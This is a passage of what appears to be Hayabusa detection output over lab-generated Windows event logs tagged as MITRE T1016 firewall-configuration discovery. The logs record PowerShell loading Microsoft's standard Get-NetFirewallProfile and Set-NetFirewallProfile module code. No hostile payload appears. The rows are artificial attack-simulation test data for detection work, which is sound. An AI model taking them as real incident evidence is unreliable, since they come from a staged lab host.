Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = 
${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" 
ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; 
